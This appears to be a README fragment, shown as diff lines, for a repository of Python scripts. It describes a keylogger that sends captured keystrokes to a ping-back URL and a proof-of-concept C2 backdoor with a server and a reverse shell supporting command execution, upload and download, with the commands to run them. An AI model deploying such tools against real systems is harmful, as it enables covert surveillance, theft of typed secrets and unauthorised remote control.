tsigouris007/python-scripts/README.md

 *Capture keystrokes and send them to a ping back URL.
 You need to specify the URL inside the script.*

 `python3 keylogger.py`

+### C2

+The c2 directory contains a POC backdoor example using a server and a reverse shell.
+You can modify the server port according to your needs or by passing arguments.
+You can execute commands as you would do in an msf shell for example.
+Additionally you can `download`, `upload`, `cd` to any directory and `exit` the shell.

+Usage example:
+**Server**
+`python3 srv.py -p 8080 -i 0.0.0.0`

+**Reverse Shell**
+`python3 rev_shell.py -p 8080 -i 0.0.0.0`